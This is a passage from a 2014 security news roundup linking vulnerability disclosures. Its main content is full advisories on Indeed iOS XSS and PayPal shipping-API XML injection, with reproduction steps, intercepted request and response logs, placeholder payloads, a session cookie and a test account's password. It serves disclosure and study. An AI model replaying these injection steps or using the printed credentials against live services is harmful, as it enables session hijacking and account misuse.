Channel: BOT24

EBAY REFLECTED XSS

Earlier in the year, I discovered an XSS vulnerability in the Selling Manager section of the eBay.

The problem was caused by improper escaping of the URL’s GET parameters, which were reflected back on the page. When choosing the “drafts” section of the session manager, I noticed that several parameters appeared in the URL

more here..........https://redfern.me/ebay-xss/

Truly scary SSL 3.0 vuln to be revealed soon: sources

Gird your loins, sysadmins: The Register has learned that news of yet another major security vulnerability - this time in SSL 3.0 - is probably imminent.

Maintainers have kept quiet about the vulnerability in the lead-up to a patch release expected in the late European evening, or not far from high noon Pacific Time.

more here............http://www.theregister.co.uk/2014/10/14/nasty_ssl_30_vulnerability_to_drop_tomorrow/

How VPN Pivoting Works (with Source Code)

A VPN pivot is a virtual network interface that gives you layer-2 access to your target’s network. Rapid7’s Metasploit Pro was the first pen testing product with this feature. Core Impact has this capability too.

In September 2012, I built a VPN pivoting feature into Cobalt Strike. I revised my implementation of this feature in September 2014. In this post, I’ll take you through how VPN pivoting works and even provide code for a simple VPN pivoting client and server you can play with.

more here.........http://blog.cobaltstrike.com/2014/10/14/how-vpn-pivoting-works-with-source-code/

two browser mem disclosure bugs (CVE-2014-1580 and CVE-something-or-other)

First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused
Firefox prior to version 33 (released today) to leak bits of
uninitialized memory when rendering certain types of truncated images
onto <canvas>.

Mozilla's advisory is here:
https://www.mozilla.org/security/announce/2014/mfsa2014-78.html

Bug is here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1063733

PoC is here:
http://lcamtuf.coredump.cx/ffgif2/

Secondly, MSRC case #19611cz is a seemingly similar issue with
Internet Explorer apparently using bits of uninitialized stack data
when handling JPEG files with an oddball DHT. You should be able to
reproduce with:

http://lcamtuf.coredump.cx/iepuzzle/canvas.html

This one doesn't have a fix yet; I decided to disclose it because it
is easily hit with an existing open-source fuzzer, and because
we went past the 90-day mark without making any evident progress on
the report. The timeline is captured here:

http://lcamtuf.blogspot.com/2014/10/two-more-browser-memory-disclosure-bugs.html

Obligatory plug - both of these have been found with:
http://code.google.com/p/american-fuzzy-lop/

MindshaRE: Statically Extracting Malware C2s Using Capstone Engine

It’s been far too long since the last MindshaRE post, so I decided to share a technique I’ve been playing around with to pull C2 and other configuration information out of malware that does not store all of its configuration information in a set structure or in the resource section (for a nice set of publicly available decoders check out KevTheHermit’s RATDecoders repository on GitHub). Being able to statically extract this information becomes important in the event that the malware does not run properly in your sandbox, the C2s are down or you don’t have the time / sandbox bandwidth to manually run and extract the information from network indicators.


more here...........http://www.arbornetworks.com/asert/2014/10/mindshare-statically-extracting-malware-c2s-using-capstone-engine/

Two Limited, Targeted Attacks; Two New Zero-Days

The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel; Microsoft assigned CVE-2014-4148 and CVE-2014-4113 to the vulnerabilities and addressed them in its October 2014 Security Bulletin.

more here............http://www.fireeye.com/blog/technical/targeted-attack/2014/10/two-targeted-attacks-two-new-zero-days.html

BSRT-2014-008 Vulnerability in BlackBerry World service affects BlackBerry 10 smartphones

This advisory addresses a spoofing vulnerability that is not currently being exploited but affects BlackBerry 10 smartphone customers running the BlackBerry World app.

more here..........http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB36360&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl

MSRT October 2014 – Hikiti

The October release of the Malicious Software Removal Tool (MSRT) is directly related to a Coordinated Malware Eradication (CME) initiative led by Novetta and with the help of many other security partners: F-Secure, ThreatConnect, ThreatTrack Security, Volexity, Symantec, Tenable, Cisco, and iSIGHT. Collaboration across private industry is crucial to addressing advanced persistent threats.

The target in this campaign is an advanced persistent threat that served as the infrastructure of actors that launched targeted attacks against multiple organizations around the world. This month, the MSRT along with all of the partners in our Virus Information Alliance program are releasing new coverage for this infrastructure: Win32/Hikiti and some of the related malware families, Win32/Mdmbot, Win32/Moudoor, Win32/Plugx, Win32/Sensode, and Win32/Derusbi.


more here.........http://blogs.technet.com/b/mmpc/archive/2014/10/14/msrt-october-2014-hikiti.aspx

[SE-2014-01] Breaking Oracle Database through Java exploits (details)

Oracle Oct 2014 CPU addresses 22 security issues affecting the Java VM
implementation embedded in Oracle Database software.

We have published details of the fixed issues and a description of
some privilege elevation techniques abusing a complete Java security
sandbox bypass condition for gaining the DBA role in an environment of
Oracle Database software.

All relevant materials accompanied by Proof of Concept codes can
be found at our SE-2014-01 project details page:

http://www.security-explorations.com/en/SE-2014-01-details.html

The codes were successfully tested against Oracle Database 11g / 12c
software running on Windows x64, Linux x86/x86-64 and Solaris x86.

Published vulnerabilities demonstrate a very well known problem
related to Java SE security (insecure use of Java Reflection API).
This API was a direct cause for dozens of security issues in Java
SE reported to the vendor in 2005, 2012 and 2013.

Java exploits make it particularly easy to elevate privileges to an
administrator role in the environment of Oracle Database software.
This is primarily due to the following:
- Java type / memory safety can be broken upon a complete security
  sandbox bypass. This can be accomplished by means of Reflection
  API manipulation or by exploiting functionality of the sun.misc.Unsafe
  class,
- Aurora JVM runs in the same process space and address space as the
  RDBMS kernel, sharing its memory heaps and directly accessing its
  relational data,
- Java VM and Oracle Database security models do not fit together. The
  security model implemented by Oracle Database lacks the advantage of
  a scoped privilege model with stack inspection [1] introduced into
  JDK 1.2 and Netscape 4.0 more than 15 years ago. As a result, arbitrary
  Java code can be successfully injected into a privileged database call
  sequence.

The above deficiencies are exploited in our POC codes. The exploitation
scenario implemented by them proceeds as follows:
- a complete Java security sandbox bypass is gained with the use of a
  single or a combination of Java Reflection API issues,
- Java type / memory safety gets broken,
- arbitrary read / write access to memory is exploited to set up a given
  database privilege elevation condition. The actual privilege elevation
  occurs as a result of a careful manipulation of the content of internal
  Java VM structures or objects of system classes.

Privilege elevation techniques (or exploitation vectors) used in our POC
codes abuse the implementation of the AUTHID DEFINER construct for database
procedures and functions defined in the Java language.

For the definer spoofing exploitation vector, successful privilege elevation
can occur as a result of a careful manipulation of the content of internal
Java VM structures. By changing a field of the eoidstkpair_handle structure to
the SYS user id value, one can easily spoof the identity of called methods
and effectively the identity seen by the Oracle Database security engine.

If CREATE SESSION is the only privilege available in a target database
environment, one can modify the contents of a Java object instance from
a privileged (AUTHID DEFINER) system class in order to inject the attacker's
code into a privileged call sequence. In our case, we set a field of a
carefully selected system class to an object instance controlled by the
attacker. Arbitrary method dispatch done through such a "spoofed" object
results in the attacker's code being called with elevated privileges.

What's also worth mentioning is that one does not need CREATE PROCEDURE
privileges in order to define arbitrary Java objects in the environment
of Oracle Database software. This privilege is primarily used by code
that integrates the Java VM with database structures (class/source/resource
handles, database tables, etc.). The introduction of a custom URL handler
(jserver:) into the Oracle Database Java VM (its class loaders) created an
opportunity to load and execute arbitrary Java classes without any
privilege checks (Issue 20).

We hope that the published materials become an eye-opener for all those that
were rather skeptical about the impact of Java security vulnerabilities on
server environments. Java security issues can pose a significant security
risk to any software that relies on a vulnerable Java VM implementation
processing untrusted, potentially malicious Java code.

Oracle Database is no exception here.

Thank you.

Best Regards,
Adam Gowdiak

---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] Understanding Java Stack Inspection, Dan S. Wallach, Edward W. Felten
    http://sip.cs.princeton.edu/pub/oakland98.pdf
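The post's central argument is that a definer-rights model cannot tell whether untrusted code has been injected into a privileged call sequence, whereas the stack-inspection model of [1] can. The following toy model, added here and not taken from Security Explorations' materials or from Oracle's or the JVM's real implementation, puts the two checks side by side on the call shape the post describes (a low-privileged session invoking a SYS-owned AUTHID DEFINER routine whose dispatch lands in attacker-controlled code); permission names, domain names and frame labels are constructed for illustration.

```python
"""Toy model: stack inspection vs. definer rights on an injected call sequence.

Constructed example: permission names, domains and the stack shapes are
illustrative and are not Oracle's or the JVM's real data structures.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Frame:
    method: str
    domain: str                    # who loaded this code: "system" or "untrusted"
    privileged: bool = False       # Java: this frame wrapped its call in doPrivileged
    definer: Optional[str] = None  # Oracle: AUTHID DEFINER routine owned by `definer`


# Permissions granted to code by its origin (Java protection-domain style).
DOMAIN_PERMISSIONS = {
    "system": {"db.grantRole", "db.readTable"},
    "untrusted": {"db.readTable"},
}

# Privileges granted to database identities (Oracle user style).
USER_PRIVILEGES = {
    "SYS": {"db.grantRole", "db.readTable"},
    "LOWPRIV": {"db.readTable"},  # a session with nothing beyond CREATE SESSION-level rights
}

SESSION_USER = "LOWPRIV"


def check_stack_inspection(stack, permission):
    """JDK 1.2 / Wallach-Felten model: walk from the newest frame toward the
    oldest. Every frame must hold the permission; reaching a doPrivileged
    frame ends the walk with a grant. A single untrusted frame between the
    privileged boundary and the check is enough to deny."""
    for frame in reversed(stack):
        if permission not in DOMAIN_PERMISSIONS[frame.domain]:
            return False
        if frame.privileged:
            return True
    return True


def check_definer_rights(stack, permission, session_user):
    """Definer-rights model as the post describes it: the effective identity is
    the owner of the innermost AUTHID DEFINER routine on the stack, and the
    origin of whatever code runs inside that call is never consulted."""
    effective = session_user
    for frame in stack:  # oldest -> newest
        if frame.definer is not None:
            effective = frame.definer
    return permission in USER_PRIVILEGES[effective]


# Legitimate call: session code invokes a SYS-owned definer-rights routine,
# which enables its privilege and calls the role-granting API itself.
LEGIT_STACK = [
    Frame("UserSession.main", "untrusted"),
    Frame("SYS.SystemClass.run", "system", privileged=True, definer="SYS"),
    Frame("SYS.RoleManager.grantRole", "system"),
]

# Injected call (the post's CREATE SESSION-only scenario): a field of the system
# class was swapped for an attacker-controlled object, so the dispatch made
# inside the privileged routine lands in untrusted code before the check.
INJECTED_STACK = [
    Frame("UserSession.main", "untrusted"),
    Frame("SYS.SystemClass.run", "system", privileged=True, definer="SYS"),
    Frame("SpoofedObject.dispatch", "untrusted"),
    Frame("SYS.RoleManager.grantRole", "system"),
]


def compare(stack, permission="db.grantRole"):
    """Evaluate one permission request under both models."""
    return {
        "stack_inspection": check_stack_inspection(stack, permission),
        "definer_rights": check_definer_rights(stack, permission, SESSION_USER),
    }


if __name__ == "__main__":
    print("legit   :", compare(LEGIT_STACK))     # both models grant
    print("injected:", compare(INJECTED_STACK))  # stack inspection denies, definer rights grants
```

The injected stack is the whole point: the definer model sees only "SYS is running", while the stack walk sees the untrusted frame sitting between the privileged boundary and the sensitive call and refuses.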

One Doesn't Simply Analyze Moudoor

Today we are pleased to see an important milestone reached in a coordinated campaign against a sophisticated and well-resourced cyber espionage group. We have recently been participating in a Coordinated Malware Eradication initiative led by Novetta, in cooperation with other security vendors particularly iSight, Cisco, Volexity, Tenable, ThreatConnect, ThreatTrack Security, Microsoft and Symantec, in the aims of disrupting the operations of this particular group. Today, we are jointly releasing an improved level of coverage against the threats utilized by the group.

This espionage group, which we believe to have a strong Chinese nexus, has been targeting several industry sectors from finance, education and government to policy groups and think tanks. They have been operational at least since 2010.

more here..........http://www.f-secure.com/weblog/archives/00002753.html

Analysis of the Linux backdoor used in freenode IRC network compromise

freenode is a large IRC network providing services to Free and Open Source Software communities, and in September the freenode staff team blogged about a potential compromise of an IRC server. NCC Group’s Cyber Defence Operations team provided pro bono digital forensic and reverse engineering services to assist the freenode infrastructure team with their incident response activities.

In this post we discuss a subset of the information we documented about one of the components involved in the compromise, specifically a Linux backdoor with some interesting functionality and features.

more here..........https://www.nccgroup.com/en/blog/2014/10/analysis-of-the-linux-backdoor-used-in-freenode-irc-network-compromise/

Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities

Document Title:
===============
Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1303


Release Date:
=============
2014-10-13


Vulnerability Laboratory ID (VL-ID):
====================================
1303


Common Vulnerability Scoring System:
====================================
3.6


Product & Service Introduction:
===============================
Find jobs using Indeed, the most comprehensive search engine for jobs. In a single search, Indeed offers free access to millions of jobs from thousands of
company websites and job boards. From search to apply, Indeed’s Job Search app helps you through the entire process of finding a new job. Since 2004, Indeed
has given job seekers free access to millions of jobs from thousands of company websites and job boards. As the leading pay-for-performance recruitment
advertising network, Indeed drives millions of targeted applicants to jobs in every field and is the most cost-effective source of candidates for thousands
of companies. We take our security very seriously and welcome any responsible disclosure of potential gaps in our systems.

(Copy of the Homepage: https://itunes.apple.com/us/app/job-search/id309735670 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Indeed.com `Job Search` v2.5 mobile web-application (api).


Vulnerability Disclosure Timeline:
==================================
2014-10-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Indeed.com (Bug Bounty)
Product: Job Search - Mobile Application API 2.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
1.1
A persistent input validation web vulnerability has been discovered in the official Indeed.com `Job Search` v2.5 mobile web-application (api).
The persistent vulnerability allows an attacker to inject their own script code on the application side of the vulnerable online service module.

The vulnerability is located in the main job search input fields `Was Stichwort, Jobtitel oder Unternehmen` and `Wo Ort, Bundesland oder Postleitzahl`.
A local, low-privileged user account is able to inject script code by using the regular `Jobs finden` search button. The injection request passes through
the mobile API and is not parsed or encoded. The attacker injects the code into the input field and can execute it in the results page through the mobile API.
The first execution occurs on the client side of the application.

After the first search request, the application remembers the strings and saves the information (application side). The client-side request carrying
the malicious code thereby turns into an application-side attack, because the context is stored in the database as part of the user profile. During the test
we used JavaScript, HTML tags and PHP code to exploit and verify the issue. The input executes frames, images and script code in the results page header, where
the vulnerable `stichwort` and `ort` values are located. The search input and the stored information can also be reviewed in the backend, which requires
a higher-privileged Indeed account.

The security risk of the vulnerabilities is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.9. Exploitation of the security issue
requires low user interaction and a registered, low-privileged mobile web application user account. Successful exploitation of the security vulnerability results in
session hijacking (user/manager/admin), persistent phishing, persistent external redirects or persistent manipulation of affected or connected module context.


Vulnerable Application(s):
                                [+] Indeed.com - Job Search v2.5 iOS Mobile Application (API)

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] Was Stichwort, Jobtitel oder Unternehmen
                                [+] Wo Ort, Bundesland oder Postleitzahl

Affected Module(s):
                                [+] Job Search Results
                                [+] History - Vorherige Job suchen


1.2
A client-side cross site scripting vulnerability has been discovered in the official Indeed.com `Job Search` v2.5 mobile web-application (api).
The vulnerability allows remote attackers to hijack website customer, moderator or admin session information via client-side cross site scripting requests.

The vulnerability is located in the `Empfänger` input of the `Job Suche > Wähle Job Angebot` module. Local, low-privileged user accounts are able to inject
script code into the `Empfänger` input field of the iOS application. The result is client-side script code execution in the context of the main job result,
next to the page bottom. The attack vector is non-persistent and the method used to inject the malicious code is POST. During the test we used JavaScript, HTML tags
and PHP code to exploit and verify the issue. The execution of the injected code occurs directly after the request through the API, at the bottom of the job
article page next to the vulnerable `Empfänger` input.

The security risk of the vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.6. Exploitation of the security
issue requires low user interaction and no privileged mobile web application user account. Successful exploitation of the security vulnerability results in
session hijacking (user/manager/admin), non-persistent phishing, non-persistent external redirects or client-side manipulation of affected or connected module context.

Vulnerable Application(s):
                                [+] Indeed.com - Job Search v2.5 iOS Mobile Application (API)

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] Job Suche > Wähle Job Angebot

Vulnerable Input(s):
                                [+] Empfänger

Affected Module(s):
                                [+] Job Suche > Job Angebot (Bottom > Empfänger)


Proof of Concept (PoC):
=======================
1.1
The persistent input validation web vulnerability can be exploited by remote attackers with a low-privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.

Test Account:
Username: bkm@evolution-sec.com
Password: keymaster148


Manual steps to reproduce the vulnerability ...

1. Install the Indeed Job Search v2.5 application for Apple iOS (https://itunes.apple.com/us/app/job-search/id309735670)
2. Open the service and register an account
3. Log in to the account
4. Open the main job search module
5. Inject your own script code payload into the two vulnerable input fields
Note: Both input fields run directly through the API of the mobile application
6. You get redirected to the results page, where the execution takes place at the top of the web page context
7. Client-side reproduction successful!
8. Now go back to the regular profile in the main app index search
Note: The mobile app allows saving the already requested context of an existing search (history search)
9. The `Vorherige Job suchen` allows requesting the saved context, and the client-side issue is now an application-side vulnerability
10. Vulnerability successfully reproduced!


1.2
The non-persistent cross site scripting vulnerability can be exploited by remote attackers without a privileged application user account and with medium or
high user interaction. For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.

1. Install the Indeed Job Search v2.5 application for Apple iOS (https://itunes.apple.com/us/app/job-search/id309735670)
2. Open the service and register an account
3. Log in to the account
4. Open the main job search module and search for any existing job name
5. Click the existing job article and scroll down to the page bottom
Note: The application uses the `Empfänger` field to notify users and the job seeker
6. Inject your own payload into the `Empfänger` input field and save it with the send button
7. The code execution occurs directly next to the vulnerable input field
Note: The context passed through the mobile API is validated incorrectly, which results in the client-side execution of code
8. Client-side vulnerability successfully reproduced!


Picture(s):
                        ../1.png through ../16.png (16 screenshots, not included here)


Solution - Fix & Patch:
=======================
1.1
The first issue can be patched by securely parsing and encoding the results page where the vulnerable values are executed.
Filter and restrict the search input passing through the mobile iOS API to prevent further persistent and non-persistent attacks.

1.2
To patch the second vulnerability it is required to encode the `Empfänger` input field, which is present in every job article. The input value needs to be
parsed to ensure attackers are not able to execute client-side attacks against customers to compromise (hijack) session information.
It may also be wise to implement a new exception for invalid requests in the mobile API and app.


Security Risk:
==============
1.1
The security risk of the persistent and non-persistent input validation web vulnerability in the result page is estimated as medium.

1.2
The security risk of the non-persistent cross site scripting web vulnerability in the `empfänger` value is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability

Document Title:
===============
Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1129

PayPal Security UID: TM13a2uL


Release Date:
=============
2014-10-14


Vulnerability Laboratory ID (VL-ID):
====================================
1129


Common Vulnerability Scoring System:
====================================
4.1


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4-9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team has discovered a filter bypass & web validation vulnerability in the PayPal Inc Mail Order Shipping web application.


Vulnerability Disclosure Timeline:
==================================
2014-10-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Shipping & MOS Application - API 2013 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An input validation vulnerability has been discovered in the official PayPal MultiOrder Shipping web application (api).
The issue allows remote attackers to inject their own malicious script code on the application side of the affected module.

The issue can be exploited by use of an XML payload in the vulnerable module to trigger the injection on the application side.
The script code execution takes place in the login procedure, in the application's error exception handling. During the
testing, it was discovered that HTML is being processed without any validation using XML CDATA tags in the shipping web
application. The `Import from Paypal/Ebay` module of the MultiOrder Shipping Application is directly affected by this
vulnerability. Exploitation of the issue executes code against people you interact with on PayPal/eBay. The issue can
be exploited from a PayPal shipping multi-user account or by remote interaction. The exception source code is given below
in the PoC for your reference.

The security risk of the persistent vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 4.1.
Exploitation of the persistent web vulnerability requires a low-privileged PayPal application user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent session hijacking, persistent phishing, persistent external redirects
to malicious sources and persistent manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Application(s):
                                [+] Paypal MultiOrder Shipping - (https://ship.paypal.com)

Vulnerable Module(s):
                                [+] Mark Order As Shipped

Vulnerable Parameter(s):
                                [+] Tracking#

Affected Module(s):
                                [+] Exception-Handling


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low-privileged web application user
account and low user interaction (click!). For security demonstration or to reproduce the security vulnerability, follow the
information and steps provided below.

PoC: Payload
<![CDATA[<[PERSISTENT INJECTED ENCODED SCRIPT CODE!]')>]]>

Manual steps to reproduce the security vulnerability ...
1. Log in to the PayPal MultiOrder Shipping application as a low-privileged user.
2. Before clicking on "Import", intercept the POST request using Tamper Data or any intercepting proxy utility / tool
3. Modify the XML field values of <ShipmentsToImport> and inject the payload directly
4. You should get a JavaScript popup, proving the existence of this vulnerability
5. Successful reproduction of the local issue in the multi-user account
Note: Now we explain how to exploit the issue remotely in combination with a user account
6. Interact after the manipulation as seller or buyer
Note: Use the already manipulated tracking information that leads to the execution in the exception context
7. After the interaction, the code executes in both tracking information fields of the shipping item listings through the exception handling
Note: The issue can be exploited by using the buyer or seller ability in both ways.
8. Successful exploitation of the remote vulnerability!


PoC: Exception Handling - PayPal Inc Shipping (API)

<!-- ERROR: GENERAL -->
<div id="ErrorGeneral" style="display: block;">
<table>
<tbody><tr height="30">
<td>
<img src="images/icon_error.gif">
</td>
<td id="ErrorGeneralText">Invalid value for: ShipmentsToImport: '<[PERSISTENT INJECTED SCRIPT CODE!])''>' Correct Input</iframe></td>
</tr>
</tbody></table>
</div>

Note: The vulnerable XML parameter in this case is  <ShipmentsToImport>


---PoC HTTP XML Request Logs ---
Information: Post Request Injecting the Payload
POST /cgi-bin/shipweb?cmd=import-shipments HTTP/1.1
Host: ship.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: text/xml; charset=UTF-8
Referer: https://ship.paypal.com/powership/shipping/dialogs/import/import.html?version=1_0_4
Content-Length: 268
Cookie: [Hidden]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<ImportShipments>
<AccountNumber>MBYAX9TQRRXHL</AccountNumber>
<ImportFromPayPal>true</ImportFromPayPal>
<ImportFromeBay>false</ImportFromeBay>
<ShipmentsToImport><![CDATA[<[PERSISTENT INJECTED SCRIPT CODE!]')>]]>''</ShipmentsToImport>
</ImportShipments>

- Response
HTTP/1.1 200 OK
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: RouxWyWiKm3aD3COV0dah-P3yUq=8zJb4FgOQ3QyTDBISYSIBB3kefJQ7mO1Q0dXMVfxNNH9O_jCvA44VtGZbUS_auLgEe8KVS-2osf_9WopL2Dx0NqZaGPDLX0TWNd3oSNQ0RKnhZYW; domain=.paypal.com; path=/; Secure; HttpOnly
Connection: close
Content-Type: text/xml
Content-Length: 333

<?xml version="1.0" encoding="UTF-8"?>
<ImportShipmentsOutput>
        <OperationStatus>
                <StatusCode>4</StatusCode>
                <ErrorMessage>Invalid value for: ShipmentsToImport: '<[PERSISTENT INJECTED SCRIPT CODE!]>'</ErrorMessage>
                <RequiredAction>Correct input</RequiredAction>
        </OperationStatus>
</ImportShipmentsOutput>


Reference(s):
https://ship.paypal.com/
/cgi-bin/shipweb?cmd=import-shipments
https://ship.paypal.com/powership/shipping/dialogs/import/import.html
https://ship.paypal.com/powership/shipping/


Solution - Fix & Patch:
=======================
Input validation should be performed on the CDATA content of the application's requests, and the reflected value should be encoded,
in order to filter malicious requests and mitigate any further risks associated with this vulnerability.


Security Risk:
==============
The security risk of the persistent script code injection web vulnerability in the shipping API module is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

PayPal Inc BB #98 MOS - Persistent Settings Vulnerability

Document Title:
===============
PayPal Inc BB #98 MOS - Persistent Settings Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=983


Release Date:
=============
2014-10-13


Vulnerability Laboratory ID (VL-ID):
====================================
983


Common Vulnerability Scoring System:
====================================
4.1


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
